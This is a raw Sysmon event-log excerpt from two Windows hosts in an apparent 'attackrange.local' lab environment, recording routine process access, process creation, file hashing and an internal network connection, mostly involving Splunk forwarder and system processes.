10341000x800000000000000083275Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083274Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083273Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083272Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083271Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083270Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083269Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083268Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083267Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.000{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B4BB-615A-8E01-00000000FD01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083266Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.000{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4BB-615A-8E01-00000000FD01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083265Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.001{2FDD8D40-B4BB-615A-8E01-00000000FD01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000107115Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:00.358{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ECE468A20D311C46B29877AB3E40541,SHA256=ECC37AF791394E9ED5D6DCAA637E6F8DD2AAAB4C116F30272B5F10D68E9A7E5A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107114Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:00.358{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4BC-615A-4C02-00000000FC01}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107113Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:00.358{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107112Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:00.358{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107111Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:00.358{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107110Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:00.358{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107109Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:00.358{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B4BC-615A-4C02-00000000FC01}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107108Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:00.358{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4BC-615A-4C02-00000000FC01}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107107Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:00.359{58E9C193-B4BC-615A-4C02-00000000FC01}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000083282Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:57.774{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50151-false10.0.1.12-8000- 23542300x800000000000000083281Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:00.266{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87022B9FEE4794F6EDCA24390C8C203B,SHA256=8DD11212DE8F913E34EE8593D3077E2E5A8413CF0EC6AEBA034796B77282BFC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107106Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:00.343{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=44ECC009E2B3067893D62D8F82FCC0AD,SHA256=7C11ED877F66C7F16C633F7B56C27547F510A18375C649139BDE3906E722BCCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083280Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:00.219{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2C6FA0452E5D92F256B8512686D3EA1,SHA256=EA0065E7C692E16C1C7F002D3DD7F92C1250969491136E36D2B04C450FB9F316,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083279Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:00.219{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD6B234C8DF6BC397C02DEA9F57CDD4D,SHA256=5CD2835440888F6E694EA33D08D3E789E82C6A32D3FF3233A964F9FC65C06ADE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107205Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.926{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5402-00000000FC01}7280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107204Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.905{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5202-00000000FC01}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000107203Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7315273E069135DD47BBC1D5D7C830D6,SHA256=D41A07B460F62AA5E034FC62B1289301C4F06EAD25C52D93371F3ED1D3584C26,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107202Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.756{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5502-00000000FC01}4728C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107201Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.756{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5502-00000000FC01}4728C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107200Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.756{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-4E02-00000000FC01}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 